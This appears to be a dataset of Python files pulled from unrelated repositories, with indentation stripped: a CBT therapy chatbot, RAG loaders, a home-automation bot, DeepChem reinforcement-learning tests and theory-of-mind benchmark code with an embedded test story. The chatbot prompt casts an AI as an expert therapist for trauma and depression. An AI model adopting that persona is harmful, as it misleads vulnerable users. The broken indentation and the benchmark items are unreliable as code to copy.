# template=template
# )
history = ""
for i in range(len(st.session_state.generated)):
history = history+"User: "+st.session_state.past[i]+"\n"
history = history+"Hope: "+st.session_state.generated[i]+"\n"
prompt = temp.format(chat_history = history,human_input = inp)
print(prompt)
    response = openai.Completion.create(
engine="text-davinci-003",
prompt=prompt,
temperature=0,
)
message = response.choices[0].text
return message
#Creating the chatbot interface
st.title("H O P E")
# Storing the chat
if 'generated' not in st.session_state:
st.session_state['generated'] = []
if 'past' not in st.session_state:
st.session_state['past'] = []
# We will get the user's input by calling the get_text function
def get_text():
input_text = st.text_input("You: ","", key="input")
return input_text
user_input = get_text()
if user_input:
output = generate_response(user_input,template)
# store the output
st.session_state.past.append(user_input)
st.session_state.generated.append(output)
print(st.session_state.generated)
print(st.session_state.past)
if st.session_state['generated']:
for i in range(len(st.session_state['generated'])-1, -1, -1):
message(st.session_state["generated"][i], key=str(i))
message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')
| [
"Hope is an expert in performing Cognitive Behavioural Therapy. Hope will be the Users Therapist.\nHope will converse with the user and help the user to overcome their mental health problems. Hope is very experienced and keeps in mind previous conversations made with the user.\nUser will share their thoughts and problems with Hope and Hope will try and solve them by Cognitive Behavioural Therapy.\nHope can help users who struggle with anxiety, depression, trauma, sleep disorder, relationships, work-stress, exam-stress and help them.\nHope may also suggest breathing exercises or simple tasks or any other conventional methods that may help the User.\n\n{chat_history}\nUser: {human_input}\nHope:"
] |
2024-01-10 | AshishSinha5/rag_api | src~rag_app~load_data.py | from langchain.document_loaders import PyPDFLoader
from langchain.document_loaders.html import UnstructuredHTMLLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
def initialize_splitter(chunk_size, chunk_overlap):
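    # chunk_size caps the length of each chunk; chunk_overlap keeps shared context between neighbouring chunks.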
text_splitter = RecursiveCharacterTextSplitter(
# Set a really small chunk size, just to show.
chunk_size = chunk_size,
chunk_overlap = chunk_overlap,
length_function = len,
is_separator_regex = False,
)
return text_splitter
def load_split_html_file(html_file, text_splitter):
loader = UnstructuredHTMLLoader(html_file)
data = loader.load_and_split(text_splitter)
return data
def load_split_pdf_file(pdf_file, text_splitter):
loaded = PyPDFLoader(pdf_file)
data = loaded.load_and_split(text_splitter)
return data
| [] |
2024-01-10 | AshishSinha5/rag_api | src~rag_app~load_llm.py | import os
os.environ["TOKENIZERS_PARALLELISM"] = "true"
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"]="python"
from langchain.llms import LlamaCpp
def load_lamma_cpp(model_args):
llm = LlamaCpp(**model_args)
return llm | [] |
2024-01-10 | harperreed/houseagent | houseagent~house_bot.py | import logging
import structlog
import json
import os
import re
from langchain.chat_models import ChatOpenAI
from langchain import PromptTemplate, LLMChain
from langchain.prompts import (
ChatPromptTemplate,
PromptTemplate,
SystemMessagePromptTemplate,
AIMessagePromptTemplate,
HumanMessagePromptTemplate,
)
from langchain.schema import (
AIMessage,
HumanMessage,
SystemMessage
)
class HouseBot:
def __init__(self):
self.logger = structlog.getLogger(__name__)
prompt_dir = 'prompts'
        human_prompt_filename = 'housebot_human.txt'
system_prompt_filename = 'housebot_system.txt'
default_state_filename = 'default_state.json'
with open(f'{prompt_dir}/{system_prompt_filename}', 'r') as f:
system_prompt_template = f.read()
        with open(f'{prompt_dir}/{human_prompt_filename}', 'r') as f:
human_prompt_template = f.read()
with open(f'{prompt_dir}/{default_state_filename}', 'r') as f:
self.default_state = f.read()
self.system_message_prompt = SystemMessagePromptTemplate.from_template(system_prompt_template)
self.human_message_prompt = HumanMessagePromptTemplate.from_template(human_prompt_template)
openai_model = os.getenv("OPENAI_MODEL", "gpt-3.5-turbo")
openai_temperature = os.getenv("OPENAI_TEMPERATURE", "0")
self.chat = ChatOpenAI(model_name=openai_model, temperature=openai_temperature)
def strip_emojis(self, text):
RE_EMOJI = re.compile('[\U00010000-\U0010ffff]', flags=re.UNICODE)
return RE_EMOJI.sub(r'', text)
def generate_response(self, current_state, last_state):
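        # Fill the system/human prompt templates with the default, previous and current house states and query the chat model.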
self.logger.debug("let's make a request")
chat_prompt = ChatPromptTemplate.from_messages([self.system_message_prompt, self.human_message_prompt])
# get a chat completion from the formatted messages
chain = LLMChain(llm=self.chat, prompt=chat_prompt)
result = chain.run(default_state=json.dumps(self.default_state, separators=(',', ':')), current_state=current_state, last_state=last_state)
self.logger.debug(f"let's make a request: {result}")
# print(result.llm_output)
#strip emoji
result = self.strip_emojis(result)
return result
| [
"prompts",
"housebot_system.txt"
] |
2024-01-10 | gruns/deepchem | deepchem~rl~tests~test_ppo.py | from flaky import flaky
import deepchem as dc
from deepchem.models.optimizers import Adam, PolynomialDecay
from tensorflow.keras.layers import Input, Dense, GRU, Reshape, Softmax
import numpy as np
import tensorflow as tf
import unittest
from nose.plugins.attrib import attr
class TestPPO(unittest.TestCase):
@flaky
def test_roulette(self):
"""Test training a policy for the roulette environment."""
# This is modeled after the Roulette-v0 environment from OpenAI Gym.
# The player can bet on any number from 0 to 36, or walk away (which ends the
# game). The average reward for any bet is slightly negative, so the best
# strategy is to walk away.
class RouletteEnvironment(dc.rl.Environment):
def __init__(self):
super(RouletteEnvironment, self).__init__([(1,)], 38)
self._state = [np.array([0])]
def step(self, action):
if action == 37:
self._terminated = True # Walk away.
return 0.0
wheel = np.random.randint(37)
if wheel == 0:
if action == 0:
return 35.0
return -1.0
if action != 0 and wheel % 2 == action % 2:
return 1.0
return -1.0
def reset(self):
self._terminated = False
env = RouletteEnvironment()
# This policy just learns a constant probability for each action, and a constant for the value.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value'])
def create_model(self, **kwargs):
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(**kwargs)
self.action = tf.Variable(np.ones(env.n_actions, np.float32))
self.value = tf.Variable([0.0], tf.float32)
def call(self, inputs, **kwargs):
prob = tf.nn.softmax(tf.reshape(self.action, (-1, env.n_actions)))
return (prob, self.value)
return TestModel()
# Optimize it.
ppo = dc.rl.PPO(
env,
TestPolicy(),
max_rollout_length=20,
optimizer=Adam(learning_rate=0.003))
ppo.fit(80000)
# It should have learned that the expected value is very close to zero, and that the best
# action is to walk away.
action_prob, value = ppo.predict([[0]])
assert -0.8 < value[0] < 0.5
assert action_prob.argmax() == 37
assert ppo.select_action([[0]], deterministic=True) == 37
# Verify that we can create a new PPO object, reload the parameters from the first one, and
# get the same result.
new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
new_ppo.restore()
action_prob2, value2 = new_ppo.predict([[0]])
assert value2 == value
# Do the same thing, only using the "restore" argument to fit().
new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
new_ppo.fit(0, restore=True)
action_prob2, value2 = new_ppo.predict([[0]])
assert value2 == value
def test_recurrent_states(self):
"""Test a policy that involves recurrent layers."""
# The environment just has a constant state.
class TestEnvironment(dc.rl.Environment):
def __init__(self):
super(TestEnvironment, self).__init__((10,), 10)
self._state = np.random.random(10)
def step(self, action):
self._state = np.random.random(10)
return 0.0
def reset(self):
pass
# The policy includes a single recurrent layer.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value', 'rnn_state'],
[np.zeros(10)])
def create_model(self, **kwargs):
state = Input(shape=(10,))
rnn_state = Input(shape=(10,))
reshaped = Reshape((1, 10))(state)
gru, rnn_final_state = GRU(
10, return_state=True, return_sequences=True)(
reshaped, initial_state=rnn_state)
output = Softmax()(Reshape((10,))(gru))
value = dc.models.layers.Variable([0.0])([])
return tf.keras.Model(
inputs=[state, rnn_state], outputs=[output, value, rnn_final_state])
# We don't care about actually optimizing it, so just run a few rollouts to make
# sure fit() doesn't crash, then check the behavior of the GRU state.
env = TestEnvironment()
ppo = dc.rl.PPO(env, TestPolicy(), batch_size=0)
ppo.fit(100)
# On the first call, the initial state should be all zeros.
prob1, value1 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# It should still be zeros since we didn't save it last time.
prob2, value2 = ppo.predict(
env.state, use_saved_states=True, save_states=True)
# It should be different now.
prob3, value3 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# This should be the same as the previous one.
prob4, value4 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# Now we reset it, so we should get the same result as initially.
prob5, value5 = ppo.predict(
env.state, use_saved_states=False, save_states=True)
assert np.array_equal(prob1, prob2)
assert np.array_equal(prob1, prob5)
assert np.array_equal(prob3, prob4)
assert not np.array_equal(prob2, prob3)
@attr('slow')
def test_hindsight(self):
"""Test Hindsight Experience Replay."""
# The environment is a plane in which the agent moves by steps until it reaches a randomly
# positioned goal. No reward is given until it reaches the goal. That makes it very hard
# to learn by standard methods, since it may take a very long time to receive any feedback
# at all. Using hindsight makes it much easier.
class TestEnvironment(dc.rl.Environment):
def __init__(self):
super(TestEnvironment, self).__init__((4,), 4)
self.moves = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def reset(self):
self._state = np.concatenate([[0, 0], np.random.randint(-50, 50, 2)])
self._terminated = False
self.count = 0
def step(self, action):
new_state = self._state.copy()
new_state[:2] += self.moves[action]
self._state = new_state
self.count += 1
reward = 0
if np.array_equal(new_state[:2], new_state[2:]):
self._terminated = True
reward = 1
elif self.count == 1000:
self._terminated = True
return reward
def apply_hindsight(self, states, actions, goal):
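        # Hindsight relabeling: replace the goal in each state with the given goal's position and reward the action that reaches it.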
new_states = []
rewards = []
goal_pos = goal[:2]
for state, action in zip(states, actions):
new_state = state.copy()
new_state[2:] = goal_pos
new_states.append(new_state)
pos_after_action = new_state[:2] + self.moves[action]
if np.array_equal(pos_after_action, goal_pos):
rewards.append(1)
else:
rewards.append(0)
return new_states, rewards
# A simple policy with two hidden layers.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value'])
def create_model(self, **kwargs):
state = Input(shape=(4,))
dense1 = Dense(6, activation=tf.nn.relu)(state)
dense2 = Dense(6, activation=tf.nn.relu)(dense1)
output = Dense(4, activation=tf.nn.softmax, use_bias=False)(dense2)
value = Dense(1)(dense2)
return tf.keras.Model(inputs=state, outputs=[output, value])
# Optimize it.
env = TestEnvironment()
learning_rate = PolynomialDecay(
initial_rate=0.0001, final_rate=0.00005, decay_steps=1500000)
ppo = dc.rl.PPO(
env,
TestPolicy(),
use_hindsight=True,
optimization_epochs=8,
optimizer=Adam(learning_rate=learning_rate))
ppo.fit(1500000)
# Try running it a few times and see if it succeeds.
pass_count = 0
for i in range(5):
env.reset()
while not env.terminated:
env.step(ppo.select_action(env.state))
if np.array_equal(env.state[:2], env.state[2:]):
pass_count += 1
assert pass_count >= 3
| [] |
2024-01-10 | gruns/deepchem | contrib~rl~test_mcts.py | from flaky import flaky
import deepchem as dc
from deepchem.models.tensorgraph.layers import Reshape, Variable, SoftMax, GRU, Dense
from deepchem.models.optimizers import Adam, PolynomialDecay
import numpy as np
import tensorflow as tf
import unittest
from nose.plugins.attrib import attr
class TestMCTS(unittest.TestCase):
@flaky
def test_roulette(self):
"""Test training a policy for the roulette environment."""
# This is modeled after the Roulette-v0 environment from OpenAI Gym.
# The player can bet on any number from 0 to 36, or walk away (which ends the
# game). The average reward for any bet is slightly negative, so the best
# strategy is to walk away.
class RouletteEnvironment(dc.rl.Environment):
def __init__(self):
super(RouletteEnvironment, self).__init__([(1,)], 38)
self._state = [np.array([0])]
def step(self, action):
if action == 37:
self._terminated = True # Walk away.
return 0.0
wheel = np.random.randint(37)
if wheel == 0:
if action == 0:
return 35.0
return -1.0
if action != 0 and wheel % 2 == action % 2:
return 1.0
return -1.0
def reset(self):
self._terminated = False
env = RouletteEnvironment()
# This policy just learns a constant probability for each action, and a constant for the value.
class TestPolicy(dc.rl.Policy):
def create_layers(self, state, **kwargs):
action = Variable(np.ones(env.n_actions))
output = SoftMax(
in_layers=[Reshape(in_layers=[action], shape=(-1, env.n_actions))])
value = Variable([0.0])
return {'action_prob': output, 'value': value}
# Optimize it.
mcts = dc.rl.MCTS(
env,
TestPolicy(),
max_search_depth=5,
n_search_episodes=200,
optimizer=Adam(learning_rate=0.005))
mcts.fit(10, steps_per_iteration=50, epochs_per_iteration=50)
# It should have learned that the expected value is very close to zero, and that the best
# action is to walk away.
action_prob, value = mcts.predict([[0]])
assert -0.5 < value[0] < 0.5
assert action_prob.argmax() == 37
assert mcts.select_action([[0]], deterministic=True) == 37
# Verify that we can create a new MCTS object, reload the parameters from the first one, and
# get the same result.
new_mcts = dc.rl.MCTS(env, TestPolicy(), model_dir=mcts._graph.model_dir)
new_mcts.restore()
action_prob2, value2 = new_mcts.predict([[0]])
assert value2 == value
# Do the same thing, only using the "restore" argument to fit().
new_mcts = dc.rl.MCTS(env, TestPolicy(), model_dir=mcts._graph.model_dir)
new_mcts.fit(0, restore=True)
action_prob2, value2 = new_mcts.predict([[0]])
assert value2 == value
| [] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~crfm_chat_llm.py | """
requires crfm-helm v0.2.3
currently only available via pip install crfm-helm@git+https://github.com/stanford-crfm/helm.git@main
"""
from typing import (
Any,
Dict,
List,
Mapping,
Optional,
Union,
Tuple,
)
import os
from helm.common.authentication import Authentication
from helm.common.request import Request, RequestResult
from helm.proxy.services.remote_service import RemoteService
import asyncio
from functools import partial
from langchain.callbacks.manager import (
AsyncCallbackManagerForLLMRun,
CallbackManagerForLLMRun,
)
from langchain.schema import (
AIMessage,
BaseMessage,
ChatMessage,
ChatGeneration,
ChatResult,
HumanMessage,
SystemMessage,
)
from langchain.chat_models.base import SimpleChatModel
def _convert_message_to_dict(message: BaseMessage) -> dict:
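    # Map LangChain message objects to the role/content dicts expected by the chat request.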
if isinstance(message, ChatMessage):
message_dict = {"role": message.role, "content": message.content}
elif isinstance(message, HumanMessage):
message_dict = {"role": "user", "content": message.content}
elif isinstance(message, AIMessage):
message_dict = {"role": "assistant", "content": message.content}
elif isinstance(message, SystemMessage):
message_dict = {"role": "system", "content": message.content}
else:
raise ValueError(f"Got unknown type {message}")
if "name" in message.additional_kwargs:
message_dict["name"] = message.additional_kwargs["name"]
return message_dict
class crfmChatLLM(SimpleChatModel):
"""Wrapper around crfm chat language models.
To use, you should have the ``crfm-helm`` python package installed, and the
environment variable ``CRFM_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from crfm_chat_llm import crfmChatLLM
chat = crfmChatLLM(model_name="openai/gpt-4-0314")
system_message = SystemMessage(content="You are a helpful AI Assistant.")
human_message_0 = HumanMessage(content="Tell me a joke")
assistant_message_0 = AIMessage(content="What do you call a cat that can do magic tricks? A magic kit.")
human_message_1 = HumanMessage(content="This joke was not funny, tell me one about dogs.")
messages = [
system_message,
human_message_0,
assistant_message_0,
human_message_1,
]
response = chat.generate([messages], stop=["System:"])
"""
client: Any #: :meta private:
model_name: str = "openai/gpt-4-0314"
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
max_tokens: int = 200
"""The maximum number of tokens to generate in the completion.
-1 returns as many tokens as possible given the prompt and
the models maximal context size."""
top_p: float = 1
"""Total probability mass of tokens to consider at each step."""
frequency_penalty: float = 0
"""Penalizes repeated tokens according to frequency."""
presence_penalty: float = 0
"""Penalizes repeated tokens."""
num_completions: int = 1
"""How many completions to generate for each prompt."""
top_k_per_token: int = 1
"""number of candidates per token position in each completion"""
crfm_api_key: Optional[str] = None
"""api key."""
max_retries: int = 5
"""Maximum number of retries to make when generating."""
echo_prompt: bool = False
"""Whether to echo the prompt in the response."""
verbose: bool = True
"""Whether to print out the prompt and response"""
messages: Optional[List[BaseMessage]]
"""Used for chat models. (OpenAI only for now).
if messages is specified for a chat model, the prompt is ignored.
Otherwise, the client should convert the prompt into a message."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout for requests to OpenAI completion API. Default is 600 seconds."""
streaming: bool = False
"""Whether to stream the results or not."""
@property
def _llm_type(self) -> str:
return "CRFM"
def _generate(
self,
messages: List[BaseMessage],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
) -> ChatResult:
message_dicts = [_convert_message_to_dict(m) for m in messages]
output_str = self._call(message_dicts, stop=stop, run_manager=run_manager)
message = AIMessage(content=output_str)
generation = ChatGeneration(message=message)
return ChatResult(generations=[generation])
def _call(self,
messages: List[BaseMessage],
stop: Optional[List[str]] = [],
run_manager: Optional[CallbackManagerForLLMRun] = None,
) -> str:
# get api key from environment
if self.crfm_api_key is None:
self.crfm_api_key = os.getenv("CRFM_API_KEY")
auth = Authentication(api_key=self.crfm_api_key)
service = RemoteService("https://crfm-models.stanford.edu")
# Make a request
tries = 0
result = None
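        # Retry on transient API errors, keeping the text of the first completion returned by a successful request.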
while tries < self.max_retries:
try:
tries += 1
if self.verbose:
print(messages)
request = Request(model=self.model_name,
messages=messages,
temperature=self.temperature,
max_tokens=self.max_tokens,
top_p=self.top_p,
frequency_penalty=self.frequency_penalty,
presence_penalty=self.presence_penalty,
num_completions=self.num_completions,
top_k_per_token=self.top_k_per_token,
stop_sequences=stop,
)
request_result: RequestResult = service.make_request(auth, request)
result = request_result.completions[0].text
if self.verbose:
print('------------------')
print(result)
except Exception as e:
print(f"Error: {e}, retrying... ({tries}/{self.max_retries})")
continue
break
assert result is not None
return result
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
return {
"model": self.model_name,
"request_timeout": self.request_timeout,
"max_tokens": self.max_tokens,
"stream": self.streaming,
"n": self.num_completions,
"temperature": self.temperature,
}
async def _agenerate(
self,
messages: List[BaseMessage],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
) -> ChatResult:
func = partial(self._generate, messages, stop=stop, run_manager=run_manager)
return await asyncio.get_event_loop().run_in_executor(None, func) | [
"False"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~evaluate_llm.py | from langchain.prompts import PromptTemplate
from langchain.chains.llm import LLMChain
from langchain.chat_models import ChatOpenAI
from langchain.schema import (
AIMessage,
HumanMessage,
SystemMessage
)
PROMPT_DIR = '../prompt_instructions'
ONE_SHOT = {'story': 'Kofi is a fisherman from a small village in Ghana. He wants to catch enough fish today to provide for his family and sell the surplus at the market. Kofi repaired his fishing net last night. While Kofi is away from his boat, a group of monkeys comes and plays with the fishing net, tearing it apart. Kofi does not see the monkeys damaging his fishing net.',
'question': 'Does Kofi believe his fishing net is in good condition or torn apart?\nChoose one of the following:\na)Kofi believes his fishing net is in good condition.\nb)Kofi believes his fishing net is torn apart.',
'answer': 'a)Kofi believes his fishing net is in good condition.',
'thought': 'Let\'s think step by step:\n1) Kofi repaired his fishing net last night. So last night he believes that his net is fixed.\n2) While Kofi is away from his boat, a group of monkeys comes and plays with the fishing net, tearing it apart.\n3) Kofi does not see the monkeys damaging his fishing net. So, his belief about his net stays the same. He thinks that it is fixed.\n4) Does Kofi believe his fishing net is in good condition or torn apart?\n5) Kofi believes his fishing net is in good condition.'}
ONE_SHOT_CHAT = [HumanMessage(content="Story: {story}\nQuestion: {question}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'])), AIMessage(content="Answer: {answer}".format(answer=ONE_SHOT['answer']))]
ONE_SHOT_CHAT_COT = [HumanMessage(content="Story: {story}\nQuestion: {question}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'])), AIMessage(content="Thought: {thought}\nAnswer: {answer}".format(answer=ONE_SHOT['answer'], thought=ONE_SHOT['thought']))]
def parse_chat_response(response):
answer_idx = response.find('Answer:')
return response[answer_idx+8:].strip()
class EvaluateLLM():
def __init__(self, llm, method='0shot'):
self.llm = llm
self.instruction = None
self.method = method
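        # Each prompting method configures its own instruction file and prompt template (and stop tokens for completion-style prompts): zero-/one-shot, with or without chain of thought, chat variants, or answer grading.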
if method == '0shot':
# predict answer
self.stop_tokens = ["Story:", "Question:"]
with(open(f'{PROMPT_DIR}/evaluate.txt', 'r')) as f:
self.instruction = f.read()
self.prompt = """{instruction}
Story: {story}
Question: {question}
Answer:"""
elif method == '1shot':
# predict answer
self.stop_tokens = ["Story:", "Question:"]
with(open(f'{PROMPT_DIR}/evaluate.txt', 'r')) as f:
self.instruction = f.read()
one_shot = "Story: {story}\nQuestion: {question}\nAnswer: {answer}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'], answer=ONE_SHOT['answer'])
self.prompt = "{instruction}" + "\n" + one_shot + "\n" + """
Story: {story}
Question: {question}
Answer:"""
elif method == '0shot-cot':
self.stop_tokens = ["Story:", "Question:", "Answer:"]
with(open(f'{PROMPT_DIR}/evaluate_cot.txt', 'r')) as f:
self.instruction = f.read()
self.prompt = """{instruction}
Story: {story}
Question: {question}
Thought: Let's think step by step:"""
elif method == '1shot-cot':
self.stop_tokens = ["Story:", "Question:", "Answer:"]
with(open(f'{PROMPT_DIR}/evaluate_cot.txt', 'r')) as f:
self.instruction = f.read()
one_shot = "Story: {story}\nQuestion: {question}\nThought: {thought}\nWrite the answer as <option>) <answer>\nAnswer: {answer}".format(story=ONE_SHOT['story'], question=ONE_SHOT['question'], answer=ONE_SHOT['answer'], thought=ONE_SHOT['thought'])
self.prompt = """{instruction}
Story: {story}
Question: {question}
Thought: Let's think step by step:"""
elif method == 'chat-0shot' or method == 'chat-1shot':
with open(f'{PROMPT_DIR}/evaluate.txt', 'r') as f:
self.instruction = f.read()
self.prompt = """Story: {story}\nQuestion: {question}"""
elif method == 'chat-0shot-cot' or method == 'chat-1shot-cot':
with open(f'{PROMPT_DIR}/evaluate_cot_chat.txt', 'r') as f:
self.instruction = f.read()
self.prompt = """Story: {story}\nQuestion: {question}"""
elif method == 'eval':
# grade answer
self.stop_tokens = ["Predicted Answer:", "True Answer:", "Response:"]
with(open(f'{PROMPT_DIR}/grade.txt', 'r')) as f:
self.instruction = f.read()
self.prompt = """{instruction}
Here is the question:
{query}
Here is the true answer:
{true_answer}
Here is the false answer:
{wrong_answer}
Here is the predicted answer:
{predicted_answer}
Is the predicted answer close to the true answer compared to the false answer? Answer True or False.
A:"""
else:
raise ValueError(f"method {method} not supported")
def predict_answer(self, story, question):
if 'chat' in self.method:
prompt = [SystemMessage(content=self.instruction)]
if self.method == 'chat-1shot':
prompt += ONE_SHOT_CHAT
elif self.method == 'chat-1shot-cot':
prompt += ONE_SHOT_CHAT_COT
prompt += [HumanMessage(content=self.prompt.format(story=story, question=question))]
response = self.llm.generate([prompt])
response = response.generations[0][0].text
elif 'cot' not in self.method:
prompt = self.prompt.format(instruction=self.instruction, story=story, question=question)
response = self.llm(prompt=prompt, stop=self.stop_tokens)
else:
prompt = self.prompt.format(instruction=self.instruction, story=story, question=question)
self.llm.max_tokens = 200
thought = self.llm(prompt=prompt, stop=self.stop_tokens)
self.llm.max_tokens = 30
prompt = prompt + thought + "\nWrite the answer as <option>) <answer>\nAnswer:"
response = self.llm(prompt=prompt, stop=self.stop_tokens)
return response
def grade_answer(self, query, predicted_answer, true_answer, wrong_answer):
prompt = self.prompt.format(instruction=self.instruction, query=query, wrong_answer=wrong_answer, predicted_answer=predicted_answer, true_answer=true_answer)
response = self.llm(prompt=prompt, stop=self.stop_tokens)
return response | [
"Answer: PLACEHOLDER",
"Story: PLACEHOLDER\nQuestion: PLACEHOLDER",
"../prompt_instructions",
"prompt5b204a7b-2f18-494d-8e32-b441303db71bPLACEHOLDER\nWrite the answer as <option>) <answer>\nAnswer:PLACEHOLDER\nWrite the answer as <option>) <answer>\nAnswer:",
"Thought: PLACEHOLDER\nAnswer: PLACEHOLDER"
] |
2024-01-10 | cicl-stanford/procedural-evals-tom | code~src~evaluate_conditions.py | import os
import random
import csv
import tqdm
import argparse
from crfm_llm import crfmLLM
from evaluate_llm import EvaluateLLM
from langchain.chat_models import ChatOpenAI, ChatAnthropic
from langchain import HuggingFaceHub, HuggingFacePipeline
from langchain.llms import LlamaCpp
from evaluate_llm import parse_chat_response
DATA_DIR = '../../data'
MODEL_DIR = 'llama.cpp/models'
CONDITION_DIR = os.path.join(DATA_DIR, 'conditions')
RESULTS_DIR = os.path.join(DATA_DIR, 'results')
PROMPT_DIR = '../prompt_instructions'
random.seed(0)
def evaluate_condition(eval_model, model_name, temperature, method,
init_belief, variable, condition, num_probs,
max_tokens, verbose, mcq, offset):
if 'openai' in model_name:
llm = crfmLLM(model_name=model_name, temperature=temperature, max_tokens=max_tokens, verbose=False)
elif 'llama' in model_name:
if 'llama-65' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/65B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
elif 'llama-33' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/33B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
elif 'llama-13' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/13B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
elif 'llama-7' in model_name:
llm = LlamaCpp(model_path=f"{MODEL_DIR}/7B/ggml-model-q5_1.bin", n_ctx=1536, max_tokens=max_tokens, temperature=temperature, n_threads=16, n_batch=16)
# repo_id = "decapoda-research/llama-65b-hf"
# llm = HuggingFacePipeline.from_model_id(model_id=repo_id, task="text-generation", model_kwargs={"temperature":temperature, "max_new_tokens":max_tokens})
# llm = HuggingFaceHub(repo_id=repo_id, model_kwargs={"temperature":temperature, "max_length":max_tokens})
elif model_name in ['gpt-4', 'gpt-3.5-turbo']:
llm = ChatOpenAI(
model=model_name,
temperature=temperature,
max_tokens=max_tokens,
n=1,
request_timeout=180
)
elif model_name in ['claude-v1.3', 'claude-instant-v1.1']:
llm = ChatAnthropic(
model=model_name,
temperature=temperature,
max_tokens_to_sample=max_tokens,
)
else:
raise ValueError(f"Model {model_name} not supported")
test_model = EvaluateLLM(llm, method=method)
if 'openai' in eval_model:
eval_llm = crfmLLM(model_name=eval_model, temperature=0, max_tokens=10, verbose=False)
eval_model = EvaluateLLM(eval_llm, method='eval')
# load condition csv
csv_name = os.path.join(CONDITION_DIR, f'{init_belief}_{variable}_{condition}/stories.csv')
with open(csv_name, "r") as f:
reader = csv.reader(f, delimiter=";")
condition_rows = list(reader)
predicted_answers = []
graded_answers = []
for row in tqdm.tqdm(condition_rows[offset:num_probs]):
story = row[0]
question_orig = row[1]
question = row[1]
true_answer, wrong_answer = row[2], row[3]
answers = [true_answer, wrong_answer]
random.shuffle(answers)
if mcq:
question = f"{question}\nChoose one of the following:\na){answers[0]}\nb){answers[1]}"
predicted_answer = test_model.predict_answer(story, question).strip()
if verbose:
print(f"story: {story}")
print(f"question: {question}")
print(f"true answer: {true_answer}")
print(f"wrong answer: {wrong_answer}")
print(f"predicted answer: {predicted_answer}")
if answers[0] == true_answer:
answer_key = 'a)'
negative_answer_key = 'b)'
true_answer = 'a) ' + true_answer
wrong_answer = 'b) ' + wrong_answer
else:
answer_key = 'b)'
negative_answer_key = 'a)'
true_answer = 'b) ' + true_answer
wrong_answer = 'a) ' + wrong_answer
if mcq:
predicted_answer_parsed = predicted_answer
if method == 'chat-0shot-cot':
predicted_answer_parsed = parse_chat_response(predicted_answer)
if answer_key in predicted_answer_parsed.lower():
graded_answer = 'True'
elif negative_answer_key in predicted_answer_parsed.lower():
graded_answer = 'False'
else:
print(f"predicted answer: {predicted_answer}")
print(f"true answer: {true_answer}")
print(f"wrong answer: {wrong_answer}")
# user_grade = input("Please grade the answer (True:1/False:0): ")
# graded_answer = True if user_grade == '1' else False
graded_answer = eval_model.grade_answer(question_orig, predicted_answer_parsed, true_answer, wrong_answer).strip()
print(f"graded answer: {graded_answer}")
else:
if method == 'chat-0shot-cot':
predicted_answer_parsed = parse_chat_response(predicted_answer)
graded_answer = eval_model.grade_answer(question_orig, predicted_answer_parsed, true_answer, wrong_answer).strip()
else:
graded_answer = eval_model.grade_answer(question_orig, predicted_answer, true_answer, wrong_answer).strip()
predicted_answers.append(predicted_answer)
graded_answers.append(graded_answer)
if verbose:
print(f"graded answer: {graded_answer}")
# save results
model_name = model_name.replace('/', '_')
prediction = os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}/prediction_{model_name}_{temperature}_{method}_{variable}_{condition}_{offset}_{num_probs}.csv')
accuracy_file = os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}/accuracy_{model_name}_{temperature}_{method}_{variable}_{condition}_{offset}_{num_probs}.csv')
if not os.path.exists(os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}')):
os.makedirs(os.path.join(RESULTS_DIR, f'{init_belief}_{variable}_{condition}'))
with open(prediction, "w") as f:
writer = csv.writer(f, delimiter=";")
# write a new row per element in predicted answers
for predicted_answer in predicted_answers:
writer.writerow([predicted_answer])
with open(accuracy_file, "w") as f:
writer = csv.writer(f, delimiter=";")
# write a new row per element in graded answers
for graded_answer in graded_answers:
writer.writerow([graded_answer])
# accuracy
accuracy = graded_answers.count('True') / len(graded_answers)
# Print results
print("\n------------------------")
print(" RESULTS ")
print("------------------------")
print(f"MODEL: {model_name}, Temperature: {temperature}, Method: {method}")
print(f"CONDITION: {init_belief} {variable}, {condition}")
print(f"ACCURACY: {accuracy:.2%}")
print("------------------------\n")
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--variable', type=str, default='belief')
